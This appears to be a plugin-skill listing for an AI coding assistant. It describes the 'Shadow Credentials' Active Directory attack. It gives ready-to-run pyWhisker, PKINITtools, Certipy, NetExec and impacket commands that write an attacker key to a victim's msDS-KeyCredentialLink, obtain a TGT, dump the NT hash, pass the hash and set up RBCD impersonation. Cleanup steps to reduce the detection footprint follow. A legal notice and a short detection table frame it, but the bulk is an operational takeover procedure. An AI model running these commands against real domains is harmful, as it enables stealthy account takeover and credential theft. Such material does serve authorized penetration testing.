Stats
Actions
Tags
'%20stop-opacity%3D'0.16'%2F%3E%3Cstop%20offset%3D'1'%20stop-color%3D'rgb(200%2C90%2C60)'%20stop-opacity%3D'0.03'%2F%3E%3C%2FlinearGradient%3E%3C%2Fdefs%3E%3Crect%20width%3D'320'%20height%3D'200'%20fill%3D'url(%23g)'%2F%3E%3Ccircle%20cx%3D'250'%20cy%3D'56'%20r%3D'92'%20fill%3D'rgb(200%2C90%2C60)'%20fill-opacity%3D'0.06'%2F%3E%3Ccircle%20cx%3D'64'%20cy%3D'172'%20r%3D'58'%20fill%3D'rgb(200%2C90%2C60)'%20fill-opacity%3D'0.05'%2F%3E%3C%2Fsvg%3E)
From cybersecurity-skills
Takes over Active Directory accounts by writing alternate certificate keys to msDS-KeyCredentialLink, enabling stealthy privilege escalation without password reset.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersecurity-skills:abusing-shadow-credentials-for-privescThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Shadow Credentials grant full takeover of the targeted account. Use only against systems you own or are explicitly authorized in writing to test. Unauthorized access is a crime.
Legal Notice: This skill is for authorized security testing and educational purposes only. Shadow Credentials grant full takeover of the targeted account. Use only against systems you own or are explicitly authorized in writing to test. Unauthorized access is a crime.
The Shadow Credentials technique abuses the msDS-KeyCredentialLink attribute of Active Directory user and computer objects. This attribute stores raw public keys ("Key Credentials") used by Windows Hello for Business and Azure AD device registration for passwordless certificate-based logon via PKINIT (Public Key Cryptography for Initial Authentication in Kerberos). If an attacker has write permission over a target object's msDS-KeyCredentialLink — typically granted by GenericWrite, GenericAll, WriteProperty, or AddKeyCredentialLink ACEs surfaced in BloodHound — they can append their own attacker-generated public key. They then request a TGT for the target via PKINIT using the matching private key and recover the target's NT hash, achieving complete account takeover without resetting the password, which is far stealthier than a forced password reset.
The technique was published by Elad Shamir ("Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover") and implemented in the C# tool Whisker. The Python equivalent pyWhisker (ShutdownRepo) manipulates the attribute over LDAP, and Certipy integrates the entire chain via certipy shadow auto. The target environment must support PKINIT and have at least one Domain Controller running Windows Server 2016 or later. Sources: pyWhisker, Whisker, The Hacker Recipes — Shadow Credentials.
GenericWrite/GenericAll/AddKeyCredentialLink over a higher-value user or computerForceChangePassword (no password reset = less disruption/alerting)msDS-KeyCredentialLink modification telemetrymsDS-KeyCredentialLink# pyWhisker (from source)
git clone https://github.com/ShutdownRepo/pywhisker
cd pywhisker && pip install .
# Certipy (integrated shadow attack)
pipx install certipy-ad
# PKINITtools for manual TGT/NT-hash extraction
git clone https://github.com/dirkjanm/PKINITtools
msDS-KeyCredentialLink| ID | Technique | Application in this skill |
|---|---|---|
| T1098.005 | Account Manipulation: Device Registration | Writing an attacker-controlled Key Credential (device key) to msDS-KeyCredentialLink to register an alternate authentication credential for the target account |
List existing Key Credentials on the target to verify you have the required access. An empty or readable result confirms write access for the add step.
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "list"
Generate a certificate/key pair and write it into the target's msDS-KeyCredentialLink. pyWhisker outputs a PFX you control.
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "add" --filename victim_shadow
# Produces victim_shadow.pfx and prints the PFX password
Use Kerberos auth instead of a password if you only hold a ticket:
python3 pywhisker.py -d "corp.local" -u "attacker" -k --no-pass \
--target "victim" --action "add" --filename victim_shadow --use-ldaps
Use the generated PFX with PKINITtools to obtain a Kerberos TGT for the target.
python3 PKINITtools/gettgtpkinit.py \
-cert-pfx victim_shadow.pfx -pfx-pass <PFX_PASSWORD> \
corp.local/victim victim.ccache
Extract the target's NT hash from the AS-REP using the session key from Step 3 (getnthash.py reads the AS-REP encryption key, displayed by gettgtpkinit.py).
export KRB5CCNAME=victim.ccache
python3 PKINITtools/getnthash.py -key <AS-REP-KEY-FROM-STEP-3> corp.local/victim
# Prints the NT hash for 'victim'
Certipy's shadow auto performs add → PKINIT → dump hash → cleanup automatically, which is ideal for computer-account takeover.
certipy shadow auto -u '[email protected]' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'victim'
# For a computer account, use the sAMAccountName with trailing $
certipy shadow auto -u '[email protected]' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'WS01$'
Authenticate with the NT hash (or the TGT) to continue the engagement.
# Pass-the-hash with NetExec
nxc smb 10.0.0.10 -u victim -H <RECOVERED-NT-HASH>
# Or use the TGT directly
export KRB5CCNAME=victim.ccache
nxc smb dc.corp.local -u victim --use-kcache
When the target is a computer, the recovered key/hash lets you configure Resource-Based Constrained Delegation to impersonate any user to that host.
# Set RBCD so attacker-controlled SPN can impersonate to WS01$
impacket-rbcd -delegate-from 'attacker$' -delegate-to 'WS01$' \
-action write 'corp.local/attacker:Passw0rd!'
Remove the injected Key Credential to restore the object and reduce detection footprint.
# pyWhisker: remove by device-id (printed during add) or clear all you added
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "remove" --device-id <DEVICE-ID>
# Certipy shadow auto cleans up automatically; otherwise:
certipy shadow clear -u '[email protected]' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'victim'
| Resource | Purpose | Link |
|---|---|---|
| pyWhisker | Python LDAP manipulation of msDS-KeyCredentialLink | https://github.com/ShutdownRepo/pywhisker |
| Whisker | Original C# implementation | https://github.com/eladshamir/Whisker |
| Certipy | shadow auto end-to-end takeover | https://github.com/ly4k/Certipy |
| PKINITtools | gettgtpkinit / getnthash | https://github.com/dirkjanm/PKINITtools |
| The Hacker Recipes | Technique walkthrough & defenses | https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials |
| Area | Guidance |
|---|---|
| Detection | Monitor Windows Security Event ID 5136 (directory object modified) for changes to msDS-KeyCredentialLink; alert when a non-AD-Connect/non-Intune principal writes the attribute. |
| Auditing | Enable directory service object change auditing on user/computer OUs. |
| Least privilege | Remove unnecessary GenericWrite/GenericAll/AddKeyCredentialLink ACEs (BloodHound AddKeyCredentialLink edge). |
| Mitigation | Where Windows Hello/device registration is unused, restrict who can write Key Credentials and consider tier-0 protected accounts. |
msDS-KeyCredentialLink confirmed (list succeeded)npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skillsTakes over Active Directory accounts by writing alternate certificate keys to msDS-KeyCredentialLink, enabling stealthy privilege escalation without password reset.
Active Directory red team methodology covering recon (BloodHound, PowerView), credential abuse (Kerberoasting, NTLM relay), escalation, lateral movement, persistence, ADCS abuse, and Defender evasion.
Provides techniques for attacking Microsoft Active Directory environments, including reconnaissance, credential harvesting, Kerberos attacks, lateral movement, and privilege escalation for red team operations.